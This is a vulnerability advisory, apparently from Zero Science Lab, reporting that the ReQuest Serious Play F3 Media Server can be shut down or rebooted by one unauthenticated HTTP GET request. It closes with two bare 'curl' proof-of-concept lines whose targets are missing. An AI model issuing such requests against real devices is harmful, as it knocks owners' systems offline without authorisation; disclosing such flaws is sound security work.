ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service

Vendor: ReQuest Serious Play LLC
Product web page:
Affected version: (Pro)

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The device can be shutdown or rebooted by an unauthenticated attacker
when issuing one HTTP GET request.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - - @zeroscience

Advisory ID: ZSL-2020-5601
Advisory URL:



$ curl
$ curl